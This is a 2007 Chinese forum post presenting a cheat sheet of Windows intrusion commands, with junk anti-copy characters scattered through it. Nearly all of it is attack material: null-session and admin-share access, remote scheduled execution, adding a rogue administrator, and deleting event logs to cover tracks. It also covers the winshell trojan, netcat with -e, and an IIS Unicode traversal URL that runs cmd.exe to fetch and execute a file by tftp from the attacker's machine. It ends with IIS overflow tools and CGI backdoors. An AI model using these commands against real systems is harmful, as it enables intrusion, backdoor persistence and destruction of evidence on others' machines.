找回密码
 入住遨海湾
搜索
网站解决方案专享优惠-3折上云
查看: 718|回复: 0

网管和黑客都必须知道的命令

[复制链接]
发表于 2007-12-22 22:40:00 | 显示全部楼层 |阅读模式

登录后查才能浏览下载更多咨询,有问题联系QQ:3283999

您需要 登录 才可以下载或查看,没有账号?入住遨海湾

×
  与远程主机建立空管连接 net use \IP地址ipc$ "" /use:"" % u0 w2 j$ H7 k3 |- X( D* ~  以管理员身份登录远程主机 net use \IP地址ipc$ "密码" /use:"Administrator" + t* u* t2 r. h! U) F  传送文件到远程主机WINNT目录下copy 本机目录路径程序 \IP地址admin$ & W/ X- n( n6 L$ Q8 R* |3 B  查看远程主机时间 net time \IP地址 1 y3 M+ K- F) V! M$ n- _  定时启动某个程序 at \IP地址 02:18 readme.exe ) `9 H2 d4 F: I9 R2 |, Y  查看共享 net view \IP地址 ! ~6 v- K* w, m8 l: \  查看netbios工作组列表 nBTstat -A IP地址 . b# S+ [, B/ F+ V9 P( {   将远程主机C盘映射为自己的F盘 net use f: \IP地址c$ ""/user:"Administrator" 0 ?9 p: l: Z# ?$ n  这两条把自己增加到管理员组: net user 用户名 密码 /add 0 M4 \) h; |) V6 R; u& S$ L   net locaLGroup Administrators 用户名 /add . c: m& l9 D1 `  断开连接 net use \IP地址ipc$ /delete 3 i( u# K1 c' m0 j% U2 [, i. c" _3 }, D- ]& V# s5 t   扫尾: # S' c$ l: ?: [, M. `6 e$ W  del C:winntsystem32logfiles*.* 9 C* R9 A3 x' A+ p  del C:winntssytem32config*.evt Q/ K3 i' t# g  del C:winntsystem32dTCLog*.* - ]5 S. g& f8 @) w  del C:winntsystem32*.log 9 ~7 \- H8 M+ h/ i2 i6 V   del C:winntsystem32*.txt . u# o. g; ]" R  del C:winnt*.txt ! y% ]# a2 A/ N. x7 M# Q1 f1 X0 M   del C:winnt*.log ! p: ]# ~6 e8 d 9 w( K4 f; `8 X) s' [ 一、netsvc.exe + b% E8 W& G) G5 Q   下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务: 2 \" ^- d8 Y/ s$ `: n0 Y ?   netsvc /list \IP地址 ) e$ e& T# V1 @% S   netsvc schedule \IP地址 /query * Y$ s6 p. _1 r9 ]   netsvc \IP地址 schedule /start ) } k7 l3 S# C3 r% |9 }7 T & q1 }% j0 t0 G6 ^/ w6 } T6 [二、OpenTelnet.exe 7 F7 [9 N$ b. ^1 O+ a, P- b; l: j   远程启动主机的Telnet服务,并绑定端口到7878,例如: 3 f6 t& W8 o! [* B J  OpenTelnet \IP地址 用户名 密码 1 7878 2 L; B1 S$ k: m7 ]4 E6 H  然后就可以telnet到主机的7878端口,进入DOS方式下: 7 o; t& b( O! b! C; e1 S  telnet IP地址 7878 2 i5 a4 j* A/ a* h; T) t. D! ^1 J- U+ _& G' R 三、winshell.exe 3 L1 ?; ?' x1 g8 d, S, w8 |   一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令: 9 h* {2 \1 l2 }% m) h' c; e6 D  p Path (查看winshell主程序的路径信息) # O! n0 g6 m" w. `  b reBoot (重新启动机器) - D: y, z. b% j6 x   d shutDown (关闭机器) c' P4 V, [/ h9 _: \   s Shell (执行后你就会看到可爱的“C:>”) 1 t3 x) \$ K( P3 G: r: y& S/ C- ]   x eXit (退出本次登录会话,此命令并不终止winshell的运行) + @ C3 ]4 i8 k( {   CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上) 6 E4 f2 [# |* q, P, v' h9 ?* u * [' e; X9 t) |( z+ Y& K8 E- L5 s四、3389登陆器,GUI方式登录远程主机的 ' |7 Q9 ^( ?0 S5 d' L* l2 k$ v/ {' G& n7 n6 w' i 五、elsave.exe * u- \1 G/ x) E! s0 Y8 t  事件日志清除工具 ! \ K( X1 z/ ?" _* x( I   elsave -s \IP地址 -l "application" -C ) h9 K0 @' S% y' s# V- e, h: f   elsave -s \IP地址 -l "system" -C V7 q" V8 m& R0 Y" n  elsave -s \IP地址 -l "security" -C ~- Z$ `/ Z/ y H# S/ m  执行后成功清除应用程序日志,系统日志,安全日志 . V" x/ P0 `$ S2 N- L8 t六、hbulot.exe 2 L3 {0 q6 ~% C0 a% B   开启win2kserver和winxp的3389服务 , X1 C$ t" ?0 D t/ j   hbulot (/r) + U4 r% S; L/ \7 Q7 Z# X 9 O$ y0 G7 M( r# v七、nc.exe(netcat.exe) ' l8 n0 Z- w: p7 x1 ~   一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。 6 G$ s+ X2 ~" `7 w0 Z1 j  想要连接到某处: nc (-options) hostname port(s)(ports) ... # s/ {/ ?: }# j" K% h, a- O; D  绑定端口等待连接: nc -l -p port (-options) (hostname) (port) # _5 J* n8 s- S3 J& g8 J + h- m) M" g# h0 W2 A参数: l( J0 @/ {8 Q8 k, M: S   -e prog 程序重定向,一旦连接,就执行 (危险!) 9 G" R: }% x8 p& o/ r! I! h6 u  -g gateway source-routing hop point(s), up to 8 % b' ]4 k2 j2 e3 m J/ C   -G num source-routing pointer: 4, 8, 12, ... 9 q8 t) E: ^( F7 q* N& L4 x R  -h 帮助信息 , S4 B% N Q$ D) F; A  -i secs 延时的间隔 ' @) {. y/ w7 ^- K  -l 监听模式,用于入站连接 " I* a' c+ Z6 y, b: r# y  -n 指定数字的IP地址,不能用hostname 9 D/ j% j g% [& ]  -o file 记录16进制的传输 M5 [% A- g% v3 I' L& o) [   -p port 本地端口号 / c' x6 r! g% k5 q; k, z' W: ^6 d  -r 任意指定本地及远程端口 - g& E" Q7 B" `+ N# _$ e  -s addr 本地源地址 - J$ c$ u S) u7 Y5 }  -u UDP模式 - i" {) l8 c& L# J' M  -v 详细输出——用两个-v可得到更详细的内容 3 L: G2 J) L+ a* T9 O  -w secs timeout的时间 % }. c! L, ~6 y  -z 将输入输出关掉——用于扫描时 & a9 i( C/ d/ b( j / O0 O: b/ u4 X- D2 `4 z( j八、TFTPD32.EXE - e2 p7 K7 s: p* ?) R   把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如: S! x% R9 H h o$ R/ ?& w   http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:winntsystem32文件名 0 o. j" h$ d5 d/ X6 E- t$ a  然后可以直接令文件运行: 6 j' }/ c0 R. B: ~! m  http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 1 a9 S8 l' x$ C; s0 ]7 o+ z: e : E3 o4 H6 ^* n3 h2 B9 c! m 九、prihack.exe是IIS的printer远程缓冲区溢出工具 # t/ R& [: D4 E; y; `  idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。 , N& G1 w; n0 U8 f' k+ [+ [: j4 [2 v/ R% J7 N' V 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接.
遨海湾-心灵的港湾 www.aosea.com
您需要登录后才可以回帖 登录 | 入住遨海湾

本版积分规则

网站解决方案专享优惠-3折上云

QQ|手机版|小黑屋|遨海湾超级社区

GMT+8, 2024-11-24 19:02

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表